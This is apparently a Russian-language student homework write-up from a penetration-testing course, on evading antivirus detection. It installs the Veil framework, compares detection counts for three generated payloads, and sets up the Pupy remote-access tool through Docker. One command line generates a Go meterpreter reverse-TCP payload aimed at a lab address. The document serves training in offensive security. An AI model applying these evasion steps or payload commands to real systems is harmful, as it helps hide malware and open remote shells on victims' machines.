Домашка №8. Защита от детектирования антивирусами

###### tags: `module5` `homework` # Домашка №8. Защита от детектирования антивирусами ## Задание 1 Для защиты от детектирования антивирусами пентестеры часто используют специальные фреймворки для обфускации payload-ов или альтернативные meterpreter решения. Вам нужно научиться пользоваться этими решениями и оценить степень их детектируемости. ## Выполнение ### Veil. Evasion Установка и первый запуск: ``` sudo apt install veil veil ========================================================================== Veil (Setup Script) | [Updated]: 2018-05-08 ========================================================================== [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ========================================================================== os = kali osversion = 2021.1 osmajversion = 2021 arch = x86_64 trueuser = kali userprimarygroup = kali userhomedir = /home/kali rootdir = /usr/share/veil veildir = /var/lib/veil outputdir = /var/lib/veil/output dependenciesdir = /var/lib/veil/setup-dependencies winedir = /var/lib/veil/wine winedrive = /var/lib/veil/wine/drive_c gempath = Z:\var\lib\veil\wine\drive_c\Ruby187\bin\gem [I] Kali Linux 2021.1 x86_64 detected... [?] Are you sure you wish to install Veil? Continue with installation? ([y]es/[s]ilent/[N]o): y [*] Pulling down binary dependencies [*] Empty folder... git cloning Cloning into '/var/lib/veil/setup-dependencies'... remote: Enumerating objects: 12, done. remote: Total 12 (delta 0), reused 0 (delta 0), pack-reused 12 Receiving objects: 100% (12/12), 207.29 MiB | 5.99 MiB/s, done. Updating files: 100% (10/10), done. [*] Installing Wine [*] Adding i386 architecture to x86_64 system for Wine [*] Updating APT [*] Installing Wine 32-bit and 64-bit binaries (via APT) ``` После установки всех необходимых компонентов запускается фрэймфорк ![](https://i.imgur.com/bgxGzwz.png) генерируем нагрузку вариант 1 ![](https://i.imgur.com/UVp8GfL.png "gen1") проверяем. результат 46 обнаружений ![](https://i.imgur.com/DSqb8Hg.png "check1") вариант 2 ![](https://i.imgur.com/0gD0GBm.png "gen2") результат ==32 обнаружения== ![](https://i.imgur.com/rrNFe8d.png "check2") вариант 3 ![](https://i.imgur.com/oyTQJA9.png "gen3") результат 40 обнаружений ![](https://i.imgur.com/sItw7Yg.png "check3") Не смотря на то, что полностью спрятать код нам не удалось, мы получили не плохой результат (вариант 2) когда большая часть антивирусных решений не смогла обнаружить нагрузку. ==32 против 35== >Генерировать payload можно и из командной строки [color=green] >veil -t Evasion -p go/meterpreter/rev_tcp.py --ip 10.0.0.3 --port 4444 Доставка payload может проводиться аналогично примеру с meterpreter выше. ## Задание 2 Pupy RAT: Установка осуществляется по инструкции: https://github.com/n1nj4sec/pupy/wiki/Installation Базовое использование: https://github.com/n1nj4sec/pupy/wiki/Basic-Usage ## Выполнение :::danger Ставиться только на сервер с gui. ::: выполняем установку на kali согласно [инструкции] (https://www.kali.org/docs/containers/installing-docker-on-kali/) предложенный в инструкции вариант установки docker-ce не подходит. ``` apt-get update && apt-get install curl -y curl -fsSL https://get.docker.com > docker_installer.sh chmod +x ./docker_installer.sh && ./docker_installer.sh ``` использую вместо него docker.io. подробности [тут](https://stackoverflow.com/questions/45023363/what-is-docker-io-in-relation-to-docker-ce-and-docker-ee) ``` ┌──(root💀kali)-[/home/kali] └─# apt install docker.io ``` для начала модули, только меняем версию питона на 3 ``` apt-get install git libssl1.0-dev libffi-dev python3-dev python3-pip build-essential swig tcpdump python3-virtualenv ``` установка прошла успешно дальше ставим Pupy и пробуем создать рабочую среду ``` git clone --recursive https://github.com/n1nj4sec/pupy cd pupy ./create-workspace.py ./work [+] Git repo at /home/kali/tools/pupy Docker either is not installed or not configured. Installation: https://docs.docker.com/install/ Missing python module: virtualenv ``` получил сообщение ==Missing python module: virtualenv== как вариант решение использовать докер https://github.com/n1nj4sec/pupy/issues/834 >You can create all the things using create-workspace.py >Check output of create-workspace.py --help > >Try something like: > >python3 create-workspace.py -E docker -P /some/folder/as/workspace создаем рабочую среду ``` ┌──(root💀kali)-[/home/kali/tools/pupy] └─# ./create-workspace.py -E docker ./work ``` ![](https://i.imgur.com/0H4l3PQ.png) ![](https://i.imgur.com/jsRvKn3.png)